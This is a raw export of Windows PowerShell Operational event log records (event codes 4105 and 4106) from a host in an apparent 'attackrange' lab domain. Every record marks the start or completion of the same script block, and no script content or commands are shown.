RecordNumber=1470128
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470127
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470126
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470125
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470124
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470123
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470122
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470121
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470120
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470119
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470118
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470117
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470116
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470115
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470114
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470113
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470112
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470111
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470110
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470109
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470108
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470107
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470106
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470105
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470104
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470103
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470102
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470101
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470100
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470099
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470098
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470097
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470096
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470095
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470094
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470093
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470092
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470091
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470090
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470089
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470088
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470087
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470086
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470085
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470084
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470083
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470082
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470081
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470080
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470079
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470078
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470077
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470076
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470075
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470074
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
